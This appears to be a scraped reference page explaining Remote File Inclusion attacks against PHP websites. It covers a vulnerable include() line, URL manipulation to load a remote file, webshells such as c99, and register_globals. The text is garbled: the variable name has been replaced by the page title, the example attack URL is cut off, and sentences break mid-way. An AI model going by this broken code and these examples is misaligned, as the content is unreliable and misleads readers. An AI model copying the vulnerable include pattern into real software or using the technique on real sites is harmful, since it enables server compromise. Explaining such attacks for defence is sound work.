| Remote File Inclusion |
Article Index for Remote |
Website Links For Remote |
Information AboutRemote File Inclusion |
| CATEGORIES ABOUT REMOTE FILE INCLUSION | |
| injection exploits | |
|
HOW THE ATTACK WORKS Remote File Inclusion attacks allow Malicious Users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: ''include(Remote File Inclusion . '/archive.php');'' This line of PHP code, when executed, yields a URL like the following example: ''www.vulnerable.website.com/index.php?title=archive.php?'' Because the Remote File Inclusion variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:''www.vulnerable.website.com/index.php?title= The include function above instructs the server to retrieve archive.php and run its code. The code does not say what to do if the user changes archive.php to a file of his own, so the script runs whatever file archive.php is replaced with. In this case, the script would execute the malicious file, This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or Root , access on the server. WHY THE ATTACK WORKS RFI attacks are possible because of a PHP configuration flag called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the Remote File Inclusion |
|
|